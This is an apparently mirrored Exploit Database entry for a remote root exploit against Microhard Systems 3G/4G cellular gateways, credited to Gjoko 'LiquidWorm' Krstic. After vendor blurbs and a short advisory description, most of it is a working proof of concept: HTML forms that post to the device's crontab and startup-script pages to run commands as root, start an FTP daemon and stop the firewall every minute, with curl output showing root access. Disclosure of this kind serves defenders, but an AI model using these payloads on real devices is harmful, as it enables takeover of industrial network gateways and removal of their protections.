Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway – Remote Root

• Exploit Database
• 123 阅读

• 作者： LiquidWorm
  日期： 2018-07-17
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/45038/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288

  Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit     Vendor: Microhard Systems Inc. Product web page: http://www.microhardcorp.com Affected version: IPn4G 1.1.0 build 1098 IPn3Gb 2.2.0 build 2160 IPn4Gb 1.1.6 build 1184-14 IPn4Gb 1.1.0 Rev 2 build 1090-2 IPn4Gb 1.1.0 Rev 2 build 1086 Bullet-3G 1.2.0 Rev A build 1032 VIP4Gb 1.1.6 build 1204 VIP4G 1.1.6 Rev 3.0 build 1184-14 VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 IPn3Gii / Bullet-3G 1.2.0 build 1076 IPn4Gii / Bullet-LTE 1.2.0 build 1078 BulletPlus 1.3.0 build 1036 Dragon-LTE 1.1.0 build 1036   Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices!   The IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data.   The all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, &apos;Secure Communication&apos; with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at!   The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application!   The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.   Desc: The application suffers from multiple authenticated arbitrary remote code execution vulnerabilities with highest privileges. This is due to multiple hidden and undocumented features within the admin interface that allows an attacker to create crontab jobs and/or modify the system startup script that allows execution of arbitrary code as root user.   Tested on: httpd-ssl-1.0.0 Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2018-5479 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5479.php     13.03.2018   --     Crontab #1: -----------   <html> <body> <form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data"> <input type="hidden" name="submit" value="1" /> <input type="hidden" name="sltMinutes" value="" /> <input type="hidden" name="sltHours" value="" /> <input type="hidden" name="sltDays" value="" /> <input type="hidden" name="sltMonths" value="" /> <input type="hidden" name="sltDaysOfWeek" value="" /> <input type="hidden" name="txthMinutes" value="" /> <input type="hidden" name="txthHours" value="" /> <input type="hidden" name="txthDays" value="" /> <input type="hidden" name="txthMonths" value="" /> <input type="hidden" name="txthDaysOfWeek" value="" /> <input type="hidden" name="ddEveryXminute" value="" /> <input type="hidden" name="ddEveryXhour" value="" /> <input type="hidden" name="ddEveryXday" value="" /> <input type="hidden" name="txtCommand" value="" /> <input type="hidden" name="txthCronEnabled" value="0" /> <input type="hidden" name="txtCrontabEntry" value="" /> <input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" /> <input type="hidden" name="HOURS_cfg02e2c8" value="*" /> <input type="hidden" name="DAYS_cfg02e2c8" value="*" /> <input type="hidden" name="MONTHS_cfg02e2c8" value="*" /> <input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" /> <input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" /> <input type="hidden" name="ENABLED_cfg02e2c8" value="1" /> <input type="hidden" name="MINUTES_cfg04b4e9" value="*" /> <input type="hidden" name="HOURS_cfg04b4e9" value="*" /> <input type="hidden" name="DAYS_cfg04b4e9" value="*" /> <input type="hidden" name="MONTHS_cfg04b4e9" value="*" /> <input type="hidden" name="WEEKDAYS_cfg04b4e9" value="*" /> <input type="hidden" name="COMMAND_cfg04b4e9" value="id > /www/pwn.txt" /> <input type="hidden" name="ENABLED_cfg04b4e9" value="1" /> <input type="hidden" name="MINUTES_newCron" value="" /> <input type="hidden" name="HOURS_newCron" value="" /> <input type="hidden" name="DAYS_newCron" value="" /> <input type="hidden" name="MONTHS_newCron" value="" /> <input type="hidden" name="WEEKDAYS_newCron" value="" /> <input type="hidden" name="COMMAND_newCron" value="" /> <input type="hidden" name="ENABLED_newCron" value="" /> <input type="hidden" name="action" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>   ---   curl http://192.168.1.1/pwn.txt uid=0(root) gid=0(root) groups=0(root)     Start ftpd: -----------   <html> <body> <form action="http://192.168.1.1/cgi-bin/webif/system-startup.sh" method="POST" enctype="multipart/form-data"> <input type="hidden" name="path" value="/etc/init.d" /> <input type="hidden" name="edit" value="custom-user-startup" /> <input type="hidden" name="filecontent" value="#!/bin/sh /etc/rc.common START=90 # place your own startup commands here # # REMEMBER: You *MUST* place an &apos;&&apos; after launching programs you # that are to continue running in the background. # # i.e. # BAD:upnpd # GOOD: upnpd & # # Failure to do this will result in the startup process halting # on this file and the diagnostic light remaining on (at least # for WRT54G(s) models). #   ftpd &   " /> <input type="hidden" name="save" value=" Save Changes " /> <input type="submit" value="Submit request" /> </form> </body> </html>     Crontab #2: -----------   <html> <body> <form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data"> <input type="hidden" name="submit" value="1" /> <input type="hidden" name="sltMinutes" value="" /> <input type="hidden" name="sltHours" value="" /> <input type="hidden" name="sltDays" value="" /> <input type="hidden" name="sltMonths" value="" /> <input type="hidden" name="sltDaysOfWeek" value="" /> <input type="hidden" name="txthMinutes" value="*" /> <input type="hidden" name="txthHours" value="*" /> <input type="hidden" name="txthDays" value="*" /> <input type="hidden" name="txthMonths" value="*" /> <input type="hidden" name="txthDaysOfWeek" value="*" /> <input type="hidden" name="ddEveryXminute" value="" /> <input type="hidden" name="ddEveryXhour" value="" /> <input type="hidden" name="ddEveryXday" value="" /> <input type="hidden" name="txtCommand" value="uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" /> <input type="hidden" name="chkCronEnabled" value="on" /> <input type="hidden" name="txthCronEnabled" value="1" /> <input type="hidden" name="txtCrontabEntry" value="* * * * * uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" /> <input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" /> <input type="hidden" name="HOURS_cfg02e2c8" value="*" /> <input type="hidden" name="DAYS_cfg02e2c8" value="*" /> <input type="hidden" name="MONTHS_cfg02e2c8" value="*" /> <input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" /> <input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" /> <input type="hidden" name="ENABLED_cfg02e2c8" value="1" /> <input type="hidden" name="MINUTES_cfg0421ec" value="*" /> <input type="hidden" name="HOURS_cfg0421ec" value="*" /> <input type="hidden" name="DAYS_cfg0421ec" value="*" /> <input type="hidden" name="MONTHS_cfg0421ec" value="*" /> <input type="hidden" name="WEEKDAYS_cfg0421ec" value="*" /> <input type="hidden" name="COMMAND_cfg0421ec" value="uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" /> <input type="hidden" name="ENABLED_cfg0421ec" value="1" /> <input type="hidden" name="MINUTES_newCron" value="" /> <input type="hidden" name="HOURS_newCron" value="" /> <input type="hidden" name="DAYS_newCron" value="" /> <input type="hidden" name="MONTHS_newCron" value="" /> <input type="hidden" name="WEEKDAYS_newCron" value="" /> <input type="hidden" name="COMMAND_newCron" value="" /> <input type="hidden" name="ENABLED_newCron" value="" /> <input type="hidden" name="action" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>   ---   curl http://192.168.1.1/os.txt Linux IPn4G 2.6.32.9 #1 Mon Jun 20 15:28:30 MDT 2016 mips GNU/Linux drwxr-xr-x5 root root0 Jul1 14:01 . drwxr-xr-x7 root root0 Dec 311969 .. -rw-r--r--1 root root4 Apr 122010 .version -rw-r--r--1 root root13461 May8 15:54 IPn4G.config drwxr-xr-x3 root root0 Jun 202016 cgi-bin -rw-r--r--1 root root 2672 Apr12010 colorize.js -rwxr-xr-x1 root root 3638 May 102010 favicon.ico drwxr-xr-x2 root root959 Jun 202016 images -rw-r--r--1 root root600 Feb 122013 index.html drwxr-xr-x2 root root224 Jun 202016 js -rw-r--r--1 root root 68 Mar1 14:09 os.txt drwxr-xr-x2 root root 79 Jun 202016 svggraph drwxr-xr-x2 root root0 Jul1 14:02 themes drwxr-xr-x2 root root0 May8 16:21 vnstat -rw-r--r--1 root root953 Apr12010 webif.js uid=0(root) gid=0(root) groups=0(root)     Disable firewall: -----------------   <html> <body> <form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data"> <input type="hidden" name="submit" value="1" /> <input type="hidden" name="sltMinutes" value="" /> <input type="hidden" name="sltHours" value="" /> <input type="hidden" name="sltDays" value="" /> <input type="hidden" name="sltMonths" value="" /> <input type="hidden" name="sltDaysOfWeek" value="" /> <input type="hidden" name="txthMinutes" value="*" /> <input type="hidden" name="txthHours" value="*" /> <input type="hidden" name="txthDays" value="*" /> <input type="hidden" name="txthMonths" value="*" /> <input type="hidden" name="txthDaysOfWeek" value="*" /> <input type="hidden" name="ddEveryXminute" value="" /> <input type="hidden" name="ddEveryXhour" value="" /> <input type="hidden" name="ddEveryXday" value="" /> <input type="hidden" name="txtCommand" value="/etc/init.d/firewall stop" /> <input type="hidden" name="chkCronEnabled" value="on" /> <input type="hidden" name="txthCronEnabled" value="1" /> <input type="hidden" name="txtCrontabEntry" value="* * * * * /etc/init.d/firewall stop" /> <input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" /> <input type="hidden" name="HOURS_cfg02e2c8" value="*" /> <input type="hidden" name="DAYS_cfg02e2c8" value="*" /> <input type="hidden" name="MONTHS_cfg02e2c8" value="*" /> <input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" /> <input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" /> <input type="hidden" name="ENABLED_cfg02e2c8" value="1" /> <input type="hidden" name="MINUTES_cfg04f65b" value="*" /> <input type="hidden" name="HOURS_cfg04f65b" value="*" /> <input type="hidden" name="DAYS_cfg04f65b" value="*" /> <input type="hidden" name="MONTHS_cfg04f65b" value="*" /> <input type="hidden" name="WEEKDAYS_cfg04f65b" value="*" /> <input type="hidden" name="COMMAND_cfg04f65b" value="/etc/init.d/firewall stop" /> <input type="hidden" name="ENABLED_cfg04f65b" value="1" /> <input type="hidden" name="MINUTES_newCron" value="" /> <input type="hidden" name="HOURS_newCron" value="" /> <input type="hidden" name="DAYS_newCron" value="" /> <input type="hidden" name="MONTHS_newCron" value="" /> <input type="hidden" name="WEEKDAYS_newCron" value="" /> <input type="hidden" name="COMMAND_newCron" value="" /> <input type="hidden" name="ENABLED_newCron" value="" /> <input type="hidden" name="action" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>